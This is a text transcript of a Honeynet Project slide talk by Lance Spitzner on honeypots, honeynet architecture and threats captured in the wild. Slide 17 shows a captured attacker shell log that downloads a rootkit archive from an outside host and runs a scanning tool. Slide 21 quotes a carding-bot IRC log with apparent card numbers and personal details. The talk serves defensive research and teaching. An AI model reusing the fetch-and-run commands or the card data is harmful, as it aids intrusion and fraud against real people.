DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share...
Transcript of DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share...
![Page 1: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/1.jpg)
Honeynets and T h e Honeynet P r oj ec t
![Page 2: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/2.jpg)
2
S p eak er• Lance Spitzner, President Honeynet Project• Passion is research and development in
honeypot related technologies.• Nine years in security, four with Sun
Microsystems as Senior Security Architect.• Author of Honeypots and co-author of Know
Your Enemy: 2nd Edition.
![Page 3: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/3.jpg)
3
P u r p ose
To explain the Honeynet Project, what we have learned, and what honeynets are.
![Page 4: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/4.jpg)
4
A g enda• The Project and Research Alliance• Examples of Research• How Honeynets Work• Learning More
![Page 5: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/5.jpg)
5
Honeynet P r oj ec t
![Page 6: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/6.jpg)
6
P r ob l emHow can we defend against an enemy, when
we don’t even know who the enemy is?
![Page 7: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/7.jpg)
7
O ne P ossi b l e S ol u ti on
To learn the tools, tactics, and motives of the blackhat community, and share the
lessons learned.
![Page 8: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/8.jpg)
8
Honeynet P r oj ec t• Volunteer organization of security
professionals.• Open Source, share all of our research and
findings.• Deploy networks around the world to be
hacked.• Everything we capture is happening in the wild.• We have no agenda, no employees, nor
anything to sell.
![Page 9: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/9.jpg)
9
G oal s• Awareness: To raise awareness of the threats
that exist.
• Information: For those already aware, to teach and inform about the threats.
• Research: To give organizations the capabilities to learn more on their own.
![Page 10: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/10.jpg)
10
P r oj ec t O r g ani z ati on• Non-profit (501c3) organization• Board of Directors• No more then two members from any
organization.• Funded by the community, including the NIC.• Diverse set of skills and experiences.• Team works virtually, from around the world.
![Page 11: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/11.jpg)
11
Honeynet R esear c h A l l i anc eStarting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying Honeynet technologies.
http://www.honeynet.org/alliance/
![Page 12: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/12.jpg)
12
A l l i anc e M em b er s• South Florida Honeynet Project • Georgia Technical Institute • Azusa Pacific University• Paladion Networks Honeynet Project (India) • Internet Systematics Lab Honeynet Project (Greece)• Mexico Honeynet (Mexico)• Honeynet.BR (Brazil)• Irish Honeynet• Norwegian Honeynet• UK Honeynet• French Honeynet Project• Italian Honeynet Project• German Honeynet Project• Spanish Honeynet Project• Singapore Honeynet Project
![Page 13: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/13.jpg)
13
E x am p l es of R esear c h
![Page 14: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/14.jpg)
14
W h at w e h av e c ap tu r ed• The Honeynet Project has captured
primarily external threats that focus on targets of opportunity.
• Little has yet to be captured on advanced threats, few honeynets to date have been designed to capture them.
![Page 15: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/15.jpg)
15
T h e T h r eat• Hundreds of scans a day.• Fastest time honeypot manually compromised, 15
minutes (worm, under 60 seconds).• Life expectancies: vulnerable Win32 system is under
three hours, vulnerable Linux system is three months.• Primarily cyber-crime, focused on Win32 platforms and
their users.• Attackers can control thousands, if not hundreds of
thousands of systems.• Only getting worse, because the crime pays and
becoming highly organized.
![Page 16: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/16.jpg)
16
W h o am I ?
![Page 17: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/17.jpg)
17
T h at W as T h enJan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TARJan 8 18:48:31 HISTORY: PID=1246 UID=0 yJan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TARJan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf LuJan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf LJan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TARJan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckrootJan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
![Page 18: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/18.jpg)
18
T h i s i s N ow
![Page 19: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/19.jpg)
19
B O T s
![Page 20: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/20.jpg)
20
D D oS f or M oney
J4ck: why don't you start charging for packet attacks?J4ck: "give me x amount and I'll take bla bla offline
for this amount of time”J1LL: it was illegal last I checkedJ4ck: heh, then everything you do is illegal. Why not
make money off of it?J4ck: I know plenty of people that'd pay exorbatent
amounts for packeting
![Page 21: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/21.jpg)
21
C r edi t C ar ds E x c h ang i ng04:55:16 COCO_JAA: !cc04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (AllThis ccs update everyday From My Hacked shopping Database - You mustregular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)04:55:42 COCO_JAA: !cclimit 440707000058895104:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard(5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)04:56:55 COCO_JAA: !cardablesite04:57:22 COCO_JAA: !cardable electronics04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics :*** 9(11 TraDecS Chk_bot FoR #goldcard9)04:58:09 COCO_JAA: !cclimit 423429439113113604:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) :9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
![Page 22: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/22.jpg)
22
How Honeynets W or k
![Page 23: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/23.jpg)
23
Honeyp ots• A honeypot is an information system resource
whose value lies in unauthorized or illicit use of that resource.
• Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise.
• Primary value to most organizations is information.
![Page 24: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/24.jpg)
24
A dv antag es
• Collect small data sets of high value.• Reduce false positives• Catch new attacks, false negatives• Work in encrypted or IPv6 environments• Simple concept requiring minimal resources.
![Page 25: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/25.jpg)
25
D i sadv antag es• Limited field of view (microscope)• Risk (mainly high-interaction honeypots)
![Page 26: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/26.jpg)
26
T yp es• Low-interaction
• Emulates services, applications, and OS’s.• Low risk and easy to deploy/maintain, but
capture limited information.
• High-interaction• Real services, applications, and OS’s• Capture extensive information, but high
risk and time intensive to maintain.
![Page 27: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/27.jpg)
27
E x am p l es of Honeyp ots
• BackOfficer Friendly• KFSensor• Honeyd• Honeynets
Low Interaction
H ig h Interaction
![Page 28: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/28.jpg)
28
Honeynets
• High-interaction honeypot designed to capture in-depth information.
• Information has different value to different organizations.
• Its an architecture you populate with live systems, not a product or software.
• Any traffic entering or leaving is suspect.
![Page 29: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/29.jpg)
29
How i t w or k sA highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.
• Data Control• Data Capture
http://www.honeynet.org/papers/honeynet/
![Page 30: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/30.jpg)
30
Honeynet - G enI I
![Page 31: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/31.jpg)
31
No Data Control
Internet
No Restrictions
No Restrictions
Honeypot
Honeypot
![Page 32: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/32.jpg)
32
Data Control
Internet
Honeywall
Honeypot
Honeypot
No Restrictions
Connections Limited Packet Scrubbed
![Page 33: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/33.jpg)
33
![Page 34: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/34.jpg)
34
D ata C ap tu r e - S eb ek• Hidden kernel module that captures all
activity• Dumps activity to the network.• Attacker cannot sniff any traffic based on
magic number and dst port.
![Page 35: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/35.jpg)
35
![Page 36: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/36.jpg)
36
B ootab l e C D R O M
![Page 37: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/37.jpg)
37
D i str i b u ted C ap ab i l i ti es
![Page 38: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/38.jpg)
38
I ssu es• Require extensive resources to properly
maintain.• Detection and anti-honeynet technologies
have been introduced.• Can be used to attack or harm other non-
Honeynet systems.• Privacy can be a potential issue.
![Page 39: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/39.jpg)
39
L eg al C ontac t f or . m i l / . g ovDepartment of Justice; Computer Crime and
Intellectual Property Section.
• Paul Ohm• Number: (202) 514.1026• E-Mail: [email protected]
![Page 40: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/40.jpg)
40
L ear ni ng M or e
![Page 41: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/41.jpg)
41
C h al l eng esThe opportunity to study real attacks on your own, compare your analysis with others, and learn about blackhats.• Scan of the Month challenges• Forensic Challenge• Reverse Challenge
http://www.honeynet.org/misc/
![Page 42: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/42.jpg)
42
K now Y ou r E nem y p ap er s• Series of papers dedicated to honeynet
research and their findings.• Translated into over 10 different languages.
http://www.honeynet.org/papers/
![Page 43: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/43.jpg)
43
K now Y ou r E nem y: 2 nd E di ti on
http://www.honeynet.org/book
![Page 44: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/44.jpg)
44
C ontr i b u ti ng
YOU?
Advanced Network Management Lab
![Page 45: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/45.jpg)
45
How to c ontr i b u te• Volunteer!• Honeywall CDROM Subscription• PayPal Donation• Buy our Book
• Funding
http://www.honeynet.org/funds/
![Page 46: DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... · the blackhat community, and share the lessons learned. 8 • Volunteer organization of security professionals. • Open](https://reader035.fdocuments.us/reader035/viewer/2022071010/5fc82a76a6e3f2553844bec6/html5/thumbnails/46.jpg)
46
C onc l u si on• The Honeynet Project is a non-profit, volunteer
organization researching cyber threats using honeynet technologies, and sharing those lessons learned.
• It is hoped our research can improve the awareness and security of the Internet community.